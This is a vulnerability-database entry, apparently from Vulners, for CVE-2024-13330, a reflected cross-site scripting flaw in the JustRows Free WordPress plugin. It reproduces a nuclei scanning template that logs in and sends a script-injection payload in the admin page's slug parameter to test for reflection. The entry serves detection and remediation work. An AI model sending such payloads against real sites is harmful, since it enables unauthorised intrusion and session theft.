Lucene search
K

JustRows WordPress - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

JustRows WordPress plugin v0.2 has reflected XSS from poor sanitization, enabling scripts in high-privilege sessions via a crafted link.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13330
4 Feb 202506:16
circl
CNNVD
WordPress plugin JustRows free 安全漏洞
4 Feb 202500:00
cnnvd
CVE
CVE-2024-13330
4 Feb 202506:00
cve
Cvelist
CVE-2024-13330 Justrows Free <= 0.2 - Reflected XSS
4 Feb 202506:00
cvelist
EUVD
EUVD-2024-51535
3 Oct 202520:07
euvd
NVD
CVE-2024-13330
4 Feb 202506:15
nvd
OSV
CVE-2024-13330
4 Feb 202506:15
osv
Patchstack
WordPress Justrows Free plugin <= 0.2 - Reflected XSS vulnerability
4 Feb 202522:32
patchstack
Positive Technologies
PT-2025-2116
4 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13330
8 Feb 202504:35
redhatcve
Rows per page
id: CVE-2024-13330

info:
  name: JustRows WordPress - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    JustRows free WordPress plugin v0.2 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious link.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version where the vulnerability is fixed, or implement proper sanitization and escaping of output.
  reference:
    - https://wpscan.com/vulnerability/b0360650-8c7a-4e17-8618-b5ef1c71ccbf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-13330
    cwe-id: CWE-79
    epss-score: 0.00556
    epss-percentile: 0.42327
    cpe: cpe:2.3:a:canaveralstudio:justrows_free:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: canaveralstudio
    product: justrows_free
    publicwww-query: "/plugins/justrows-free/"
  tags: cve,cve2024,canaveralstudio,justrows-free,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=justrows-edit&slug=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","justrows-free")
        condition: and
# digest: 490a00463044022003202b44f0464e6dbcdf8f667a5b69aa227859b7fea8c8b61b6f8e616403a74e022036f4ac911883d401cf4bd5744e37735cb0370508f3797bde297049ad85ddae67:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 03:20Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.1
EPSS0.00556
SSVC
12